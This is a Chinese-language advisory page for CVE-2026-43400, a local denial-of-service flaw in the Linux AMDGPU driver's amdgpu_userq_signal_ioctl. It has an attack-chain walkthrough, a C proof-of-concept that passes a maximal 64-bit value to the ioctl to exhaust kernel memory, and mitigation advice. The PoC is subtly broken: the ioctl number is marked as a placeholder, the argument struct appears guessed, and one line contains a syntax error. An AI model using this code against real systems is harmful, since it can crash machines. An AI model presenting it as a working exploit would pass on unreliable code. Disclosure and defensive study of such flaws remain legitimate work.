CVE-2026-43400 CVSS 5.5 中危

CVE-2026-43400: Linux内核AMDGPU驱动拒绝服务漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43400

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的DRM/AMDGPU驱动程序存在安全漏洞。在`amdgpu_userq_signal_ioctl`函数中，由于未对用户输入的值进行上限检查，攻击者可传入巨大的数值。这会导致内核尝试分配过量内存，引发内存耗尽（OOM），从而导致系统崩溃或服务不可用。该漏洞允许本地低权限用户利用，无需用户交互即可影响系统可用性。

技术细节

该漏洞位于Linux内核的AMDGPU驱动模块，具体涉及`amdgpu_userq_signal_ioctl`函数的实现。该函数负责处理用户空间通过ioctl接口传递的信号操作请求。在受影响的版本中，代码缺少对输入参数（如句柄数量或偏移量）的有效性验证，特别是未将其与合理的上限值`AMDGPU_USERQ_MAX_HANDLES`进行比较。攻击者可以通过构造恶意输入，传递一个极大值（例如接近64位整数上限）给该ioctl接口。内核在处理该请求时，会根据该数值尝试分配内存或进行相关操作。由于数值过大，分配请求将迅速耗尽系统内存资源，触发内核的OOM Killer机制。这不仅会导致攻击进程被终止，还可能导致系统整体挂起或重启，破坏了系统的可用性。

攻击链分析

STEP 1

获取本地访问

攻击者获取目标系统上的本地低权限用户访问权限。

STEP 2

打开设备文件

攻击者打开AMDGPU显卡设备文件（如/dev/dri/renderD*）。

STEP 3

构造恶意参数

攻击者准备IOCTL参数结构体，将控制输入大小的字段（如handle）设置为一个极大值（0xFFFFFFFFFFFFFFFF）。

STEP 4

执行系统调用

攻击者调用`amdgpu_userq_signal_ioctl`，将恶意参数传递给内核。

STEP 5

触发内存耗尽

内核处理请求时尝试分配超出系统物理能力的内存，触发OOM Killer，导致系统崩溃或无响应。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>

// Placeholder for the actual IOCTL command number
#define DRM_IOCTL_AMDGPU_USERQ_SIGNAL 0x40444501 

// Structure representing the arguments for the vulnerable ioctl
struct amdgpu_userq_signal_args {
    __u64 handle; // The vulnerable input field
    __u32 flags;
    __u32 pad;
};

int main(int argc, char **argv) {
    int fd;
    struct amdgpu_userq_signal_args args;
    const char *device = "/dev/dri/renderD128"; // Typical AMD GPU device path

    // Open the device file
    fd = open(device, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        returnEXIT_FAILURE;
    }

    memset(&args, 0, sizeof(args));

    // Exploit: Set a huge value to trigger OOM
    // This value bypasses the missing upper bound check
    args.handle = 0xFFFFFFFFFFFFFFFF; 

    printf("Sending malicious payload to trigger OOM...\n");
    
    // Invoke the vulnerable ioctl
    if (ioctl(fd, DRM_IOCTL_AMDGPU_USERQ_SIGNAL, &args) < 0) {
        perror("Ioctl call failed");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

建议系统管理员立即应用官方提供的内核补丁。如果无法立即升级内核，应严格限制本地用户权限，防止潜在攻击者执行恶意代码。同时，监控系统的内存使用情况以检测异常的OOM事件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表